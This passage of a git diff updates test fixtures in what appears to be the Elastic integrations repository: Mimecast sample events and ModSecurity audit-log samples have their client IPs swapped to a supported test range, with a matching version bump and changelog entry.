Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local\u003e\"}", + "ingested": "2021-12-09T15:16:07.699295800Z", + "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"nflshop.com@eml.nflshop.com\",\"url\":\"https:\\/\\/www.nflshop.com\\/how-can-i-contact-customer-service\\/ch-2244\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"25% Off Tees to Give During Early Gifting Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Fashion \u0026 Beauty\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T13:31:56+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local\u003e\"}", "created": "2021-10-16T13:31:56+0000" }, "user": { diff --git a/packages/mimecast/manifest.yml b/packages/mimecast/manifest.yml index 7f634de1bd0..d2b7686c1e5 100644 --- a/packages/mimecast/manifest.yml +++ b/packages/mimecast/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: mimecast title: "Mimecast" -version: 0.0.2 +version: 0.0.3 license: basic description: "Fetching logs from Mimecast API and ingest into Elasticsearch" type: integration diff --git a/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log b/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log index 00c1bf37a1a..d6947361e58 100644 --- a/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log +++ b/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log @@ -4,11 +4,11 @@ {"transaction":{"client_ip":"51.81.186.254","time_stamp":"Fri May 14 14:46:53 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":56627,"host_ip":"51.81.186.254","host_port":443,"id":"162100361322.069228","request":{"method":"GET","http_version":1.1,"uri":"/customers/properties?trip_id=0","headers":{"Host":"www.owayride.com","Authorization":"a062a8301dea86879ee7bb3c2115705f420c10aebb1279c504396736d7ae9489","Content-Type":"application/json","Connection":"keep-alive","Accept":"*/*","User-Agent":"Oway Ride/7.0.27 (com.owaycabs.passenger; build:200116; iOS 14.4.2) Alamofire/4.9.0","Accept-Language":"en-MM;q=1.0, my-MM;q=0.9","Accept-Encoding":"gzip;q=1.0, compress;q=0.5"}},"response":{"http_code":500,"headers":{"X-Runtime":"2.583300","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Vary":"Origin","Status":"500 Internal Server Error","X-Request-Id":"d77491f3-7bf4-4753-b474-01c68daa1a84","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Content-Length":"1477","Date":"Fri, 14 May 2021 14:46:55 GMT","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"210.14.100.32","time_stamp":"Fri May 14 14:49:05 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":27034,"host_ip":"210.14.100.32","host_port":443,"id":"162100374575.622721","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2762450/finish","headers":{"Authorization":"694293942460dee77c1a7d11c01adc3ba66b0b44b3ae7dab5f79a422a5e464ba","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1074","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 14:49:06 GMT","Server":"nginx/1.14.0","X-Request-Id":"11b01166-6955-4458-9506-492ed3cc276c","X-Download-Options":"noopen","X-Runtime":"0.176057","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"128.14.80.81","time_stamp":"Fri May 14 14:49:13 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":49618,"host_ip":"128.14.80.81","host_port":443,"id":"162100375347.540524","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2762450/finish","headers":{"Authorization":"694293942460dee77c1a7d11c01adc3ba66b0b44b3ae7dab5f79a422a5e464ba","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1074","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 14:49:13 GMT","Server":"nginx/1.14.0","X-Request-Id":"35c798ee-6446-432a-8b10-bc50937cf9a6","X-Download-Options":"noopen","X-Runtime":"0.156531","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} -{"transaction":{"client_ip":"176.58.101.217","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"176.58.101.217","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.14","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"67.43.156.14","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} {"transaction":{"client_ip":"37.120.205.2","time_stamp":"Fri May 14 15:08:22 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":55175,"host_ip":"37.120.205.2","host_port":443,"id":"162100490217.924032","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2734183/finish","headers":{"Authorization":"365dcb63535abc1ecf5a98611a028f82389ad4a07678eea5a6260b12993f0906","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1010","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 15:08:23 GMT","Server":"nginx/1.14.0","X-Request-Id":"446039c0-0fcf-43f2-af46-6c8227c82f4e","X-Download-Options":"noopen","X-Runtime":"0.165052","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:11:52 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"162.62.123.46","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:01 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"162.62.123.46","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:18 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"162.62.123.46","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:11:52 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"67.43.156.15","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:01 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"67.43.156.15","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:18 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"67.43.156.15","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} {"transaction":{"client_ip":"37.120.205.2","time_stamp":"Fri May 14 15:16:44 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":59740,"host_ip":"37.120.205.2","host_port":443,"id":"162100540477.608948","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2734183/finish","headers":{"Authorization":"365dcb63535abc1ecf5a98611a028f82389ad4a07678eea5a6260b12993f0906","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1010","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 15:16:44 GMT","Server":"nginx/1.14.0","X-Request-Id":"173bac1d-4ac8-4e6c-8fba-1f15a5b9e5f6","X-Download-Options":"noopen","X-Runtime":"0.108246","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"5.8.26.201","time_stamp":"Fri May 14 15:31:08 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":52299,"host_ip":"5.8.26.201","host_port":443,"id":"162100626860.990852","request":{"method":"GET","http_version":1.1,"uri":"/customers/properties?trip_id=0","headers":{"Host":"www.owayride.com","Authorization":"2d47f33d04f8934c35cdd40e09257928aeea4995dd2c31167a265fac0fb5da21","Content-Type":"application/json","Connection":"keep-alive","Accept":"*/*","User-Agent":"Oway Ride/7.0.27 (com.owaycabs.passenger; build:200116; iOS 14.5.1) Alamofire/4.9.0","Accept-Language":"en-MM;q=1.0, my-MM;q=0.9","Accept-Encoding":"gzip;q=1.0, compress;q=0.5"}},"response":{"http_code":500,"headers":{"X-Runtime":"2.495058","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Vary":"Origin","Status":"500 Internal Server Error","X-Request-Id":"3e75f502-36bc-43f5-a827-0a4724952696","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Content-Length":"1477","Date":"Fri, 14 May 2021 15:31:11 GMT","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"210.14.100.32","time_stamp":"Fri May 14 15:36:40 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":27070,"host_ip":"210.14.100.32","host_port":443,"id":"162100660087.362558","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2762450/finish","headers":{"Authorization":"694293942460dee77c1a7d11c01adc3ba66b0b44b3ae7dab5f79a422a5e464ba","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1074","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 15:36:40 GMT","Server":"nginx/1.14.0","X-Request-Id":"142c0213-df87-4237-9215-451e580c9731","X-Download-Options":"noopen","X-Runtime":"0.177242","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} diff --git a/packages/modsecurity/changelog.yml b/packages/modsecurity/changelog.yml index f29ae026917..96051cf9a71 100644 --- a/packages/modsecurity/changelog.yml +++ b/packages/modsecurity/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.1.1" changes: - description: Fix logic that checks for the 'forwarded' tag diff --git a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log index f8fa8be960e..c7c26b78875 100644 --- a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log +++ b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log @@ -1,4 +1,4 @@ -{"transaction":{"client_ip":"176.58.101.217","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"176.58.101.217","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; 